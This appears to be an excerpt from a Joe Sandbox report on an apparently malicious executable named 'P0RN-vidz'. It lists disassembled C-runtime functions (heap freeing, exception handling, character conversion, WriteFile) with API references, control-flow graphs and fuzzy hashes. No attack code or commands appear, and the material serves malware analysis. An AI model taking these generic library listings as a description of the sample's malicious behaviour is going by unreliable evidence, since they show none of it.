                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802d375b4b73ef7019fa56da8dd41a1ffea8ed768c8dac352c77c3add15a143b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31F271900209BBCB369E78CC84EFB7BADEB85304F1581A8E95D87251E734AD448B50
                                                                                                                                                                                                                                          Function 0037A5E5 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0037A5E0,?,?,00000008,?,?,0037A280,00000000), ref: 0037A812
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                          • Opcode ID: c2345ca30669b6629b20e54b3c594ed3a521c16de614b756a2df1e48d9c7ebbd
                                                                                                                                                                                                                                          • Instruction ID: fe03d47a33880f3a513c72198298627db99b0654e041c97ac65b56c9cebf793d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2345ca30669b6629b20e54b3c594ed3a521c16de614b756a2df1e48d9c7ebbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDB14F35510A08DFD72ACF28C486B597BE0FF45354F2AC658E899CF2A1C339D982CB41
                                                                                                                                                                                                                                          Function 00371BD4 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00371BEA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                          • Opcode ID: 627aee5ed8bee0fe46869308b1a7e181345d51bac00058f6432dfa6153251a1a
                                                                                                                                                                                                                                          • Instruction ID: 7c4ad0f880481f37ec37d46b5a93e802322204e29b08478b21b35af67d4346b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627aee5ed8bee0fe46869308b1a7e181345d51bac00058f6432dfa6153251a1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9A17DF2900385CFDB2ACF58DC816EDBBB9FB48310F25816AD819EB654D3389885CB50
                                                                                                                                                                                                                                          Function 00371AAD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB9,00371300), ref: 00371AB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                          • Opcode ID: 496d626f58c13cd0ac59a7aee4c2b7ffd06df47ee001dca3d02f871842109190
                                                                                                                                                                                                                                          • Instruction ID: 57fda8cd781b5e2a581381ad964ed22cdfdc4b2f99a345e12e278856433185de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 496d626f58c13cd0ac59a7aee4c2b7ffd06df47ee001dca3d02f871842109190
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                          Function 003769E3 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: 19e5050806b861c7c68cfbad505f49acdb1b587fe1c1f72898f938bbe440fdde
                                                                                                                                                                                                                                          • Instruction ID: 5f53f8d3beb570d6f3c7c91e19677a922b7562ae9a41ee3c8dd88b9d51fca2dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e5050806b861c7c68cfbad505f49acdb1b587fe1c1f72898f938bbe440fdde
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AA002706012059B97518F355A5930975AD5645791F5540655509C5160E72444905B11
                                                                                                                                                                                                                                          Function 00376657 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 81 376657-37666b 82 37666d-376672 81->82 83 3766d9-3766e1 81->83 82->83 86 376674-376679 82->86 84 3766e3-3766e6 83->84 85 376728-376740 call 3767ca 83->85 84->85 87 3766e8-376725 call 3749b9 * 4 84->87 94 376743-37674a 85->94 86->83 89 37667b-37667e 86->89 87->85 89->83 92 376680-376688 89->92 95 3766a2-3766aa 92->95 96 37668a-37668d 92->96 97 37674c-376750 94->97 98 376769-37676d 94->98 101 3766c4-3766d8 call 3749b9 * 2 95->101 102 3766ac-3766af 95->102 96->95 99 37668f-3766a1 call 3749b9 call 3761c8 96->99 103 376766 97->103 104 376752-376755 97->104 108 376785-376791 98->108 109 37676f-376774 98->109 99->95 101->83 102->101 107 3766b1-3766c3 call 3749b9 call 3762c6 102->107 103->98 104->103 112 376757-376765 call 3749b9 * 2 104->112 107->101 108->94 111 376793-3767a0 call 3749b9 108->111 116 376776-376779 109->116 117 376782 109->117 112->103 116->117 124 37677b-376781 call 3749b9 116->124 117->108 124->117
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0037669B
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003761E5
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003761F7
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376209
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 0037621B
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 0037622D
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 0037623F
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376251
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376263
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376275
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376287
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376299
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003762AB
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003762BD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376690
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766B2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766C7
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766D2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766F4
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376707
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376715
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376720
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376758
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0037675F
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0037677C
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376794
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                          • Opcode ID: 676272a50b19d6e96ceb55e5b31b886e33238e2189089000eb78f763bdb4b247
                                                                                                                                                                                                                                          • Instruction ID: 490cec1cb56d84e89eefcbc5068fa6165619de766484823712f0ea31e3fffd0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 676272a50b19d6e96ceb55e5b31b886e33238e2189089000eb78f763bdb4b247
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05319E31600B019FEB36AA79E856B5673E9EF02350F55C419E54DEB292DF39BD40CB10
                                                                                                                                                                                                                                          Function 00374480 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 138 374480-374491 139 374493-37449c call 3749b9 138->139 140 37449d-374528 call 3749b9 * 9 call 374346 call 374396 138->140 139->140
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374494
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744A0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744AB
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744B6
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744C1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744CC
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744D7
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744E2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744ED
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744FB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: b32ca2cab056e605b5ff187fc0f7b984621249691e4a1c1ad85087e34b035ece
                                                                                                                                                                                                                                          • Instruction ID: 63303d1dc97cadb1f12a7f83ae890cb1039eb0046417664e9dedd9e8df62e5bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b32ca2cab056e605b5ff187fc0f7b984621249691e4a1c1ad85087e34b035ece
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74114476510108FFDB12EF95D942DDA3BA5EF06350B5181A6BB4C8F222DB35EA50DF80
                                                                                                                                                                                                                                          Function 00371F50 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 165 371f50-371fa1 call 37add0 call 371f10 call 3724c7 172 371fa3-371fb5 165->172 173 371ffd-372000 165->173 175 372020-372029 172->175 176 371fb7-371fce 172->176 174 372002-37200f call 3724b0 173->174 173->175 180 372014-37201d call 371f10 174->180 178 371fe4 176->178 179 371fd0-371fde call 372450 176->179 182 371fe7-371fec 178->182 187 371ff4-371ffb 179->187 188 371fe0 179->188 180->175 182->176 185 371fee-371ff0 182->185 185->175 189 371ff2 185->189 187->180 190 371fe2 188->190 191 37202a-372033 188->191 189->180 190->182 192 372035-37203c 191->192 193 37206d-37207d call 372490 191->193 192->193 195 37203e-37204d call 37ac10 192->195 198 372091-3720ad call 371f10 call 372470 193->198 199 37207f-37208e call 3724b0 193->199 203 37204f-372067 195->203 204 37206a 195->204 199->198 203->204 204->193
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00371F87
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00371F8F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00372018
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00372043
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00372098
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$ 7
                                                                                                                                                                                                                                          • API String ID: 1170836740-1596769016
                                                                                                                                                                                                                                          • Opcode ID: 59ecd8231d2c6da7cb1cf2336bb6e556a3525219da16a64e776f18a1fda4bb6d
                                                                                                                                                                                                                                          • Instruction ID: f4eff701c78e46b465673930112d2281a6b5277ea4588a13907102a16d0a165e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59ecd8231d2c6da7cb1cf2336bb6e556a3525219da16a64e776f18a1fda4bb6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D541A234A00248ABCF32DF69C884A9FBBB5FF45324F14C155E81D9B392D739A955CBA0
                                                                                                                                                                                                                                          Function 00377C04 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 211 377c04-377c1d 212 377c33-377c38 211->212 213 377c1f-377c2f call 37841c 211->213 215 377c45-377c69 MultiByteToWideChar 212->215 216 377c3a-377c42 212->216 213->212 221 377c31 213->221 218 377c6f-377c7b 215->218 219 377dfc-377e0f call 37123a 215->219 216->215 222 377ccf 218->222 223 377c7d-377c8e 218->223 221->212 227 377cd1-377cd3 222->227 224 377c90-377c9f call 37ad70 223->224 225 377cad-377cb3 223->225 230 377df1 224->230 236 377ca5-377cab 224->236 229 377cb4 call 37644f 225->229 227->230 231 377cd9-377cec MultiByteToWideChar 227->231 233 377cb9-377cbe 229->233 235 377df3-377dfa call 3765ba 230->235 231->230 234 377cf2-377d0d call 375b65 231->234 233->230 237 377cc4 233->237 234->230 243 377d13-377d1a 234->243 235->219 240 377cca-377ccd 236->240 237->240 240->227 244 377d54-377d60 243->244 245 377d1c-377d21 243->245 247 377d62-377d73 244->247 248 377dac 244->248 245->235 246 377d27-377d29 245->246 246->230 249 377d2f-377d49 call 375b65 246->249 251 377d75-377d84 call 37ad70 247->251 252 377d8e-377d94 247->252 250 377dae-377db0 248->250 249->235 263 377d4f 249->263 254 377db2-377dcb call 375b65 250->254 255 377dea-377df0 call 3765ba 250->255 251->255 266 377d86-377d8c 251->266 257 377d95 call 37644f 252->257 254->255 269 377dcd-377dd4 254->269 255->230 262 377d9a-377d9f 257->262 262->255 267 377da1 262->267 263->230 268 377da7-377daa 266->268 267->268 268->250 270 377dd6-377dd7 269->270 271 377e10-377e16 269->271 272 377dd8-377de8 WideCharToMultiByte 270->272 271->272 272->255 273 377e18-377e1f call 3765ba 272->273 273->235
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00375618,00000000,?,?,?,00377E55,?,?,00000100), ref: 00377C5E
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00377C96
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00377E55,?,?,00000100,5EFC4D8B,?,?), ref: 00377CE4
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00377D7B
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00377DDE
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00377DEB
                                                                                                                                                                                                                                            • Part of subcall function 0037644F: HeapAlloc.KERNEL32(00000000,?,00000004,?,00377FAB,?,00000000,?,003769BF,?,00000004,00000000,?,?,?,00373D1D), ref: 00376481
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00377DF4
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00377E19
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                          • Opcode ID: 607781e9a58aafd1419e304750cee0041a4ee1f2e7d333e1c37049d30ef7c670
                                                                                                                                                                                                                                          • Instruction ID: ebb63328c38fc8dca7469a8438acc46b92311d00cfb0ef3ad4235e8d5dfd541c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 607781e9a58aafd1419e304750cee0041a4ee1f2e7d333e1c37049d30ef7c670
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D251D072604216ABDB378F64CC92EBB77AAEF44750F168628FC1CDA180EB78DC51C650
                                                                                                                                                                                                                                          Function 00378567 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 276 378567-3785c4 GetConsoleCP 277 378707-378719 call 37123a 276->277 278 3785ca-3785e6 276->278 280 378601-378612 call 3761a2 278->280 281 3785e8-3785ff 278->281 288 378614-378617 280->288 289 378638-37863a 280->289 283 37863b-37864a call 377407 281->283 283->277 292 378650-378670 WideCharToMultiByte 283->292 290 3786de-3786fd 288->290 291 37861d-37862f call 377407 288->291 289->283 290->277 291->277 298 378635-378636 291->298 292->277 294 378676-37868c WriteFile 292->294 296 3786ff-378705 GetLastError 294->296 297 37868e-37869f 294->297 296->277 297->277 299 3786a1-3786a5 297->299 298->292 300 3786a7-3786c5 WriteFile 299->300 301 3786d3-3786d6 299->301 300->296 303 3786c7-3786cb 300->303 301->278 302 3786dc 301->302 302->277 303->277 304 3786cd-3786d0 303->304 304->301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00378CDC,?,00000000,?,00000000,00000000), ref: 003785A9
                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00378624
                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0037863F
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00378665
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00378CDC,00000000,?,?,?,?,?,?,?,?,?,00378CDC,?), ref: 00378684
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00378CDC,00000000,?,?,?,?,?,?,?,?,?,00378CDC,?), ref: 003786BD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                          • Opcode ID: 9d4106c71564aa53112b895134e7dc964056db9078b8b1d65e486c12e9fb15eb
                                                                                                                                                                                                                                          • Instruction ID: 606e4d30a2fd4def47a809b64521126678d547164146782345fcc8529448c864
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d4106c71564aa53112b895134e7dc964056db9078b8b1d65e486c12e9fb15eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2451C671A00249AFDB26CFA8DC45AEEBBF8FF08300F14855AE559E7291DB34D941CB61
                                                                                                                                                                                                                                          Function 0037636B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 305 37636b-376376 306 37644c-37644e 305->306 307 37637c-376449 call 37632f * 5 call 3749b9 * 3 call 37632f * 5 call 3749b9 * 4 305->307 307->306
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0037632F: _free.LIBCMT ref: 00376358
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003763B9
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003763C4
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003763CF
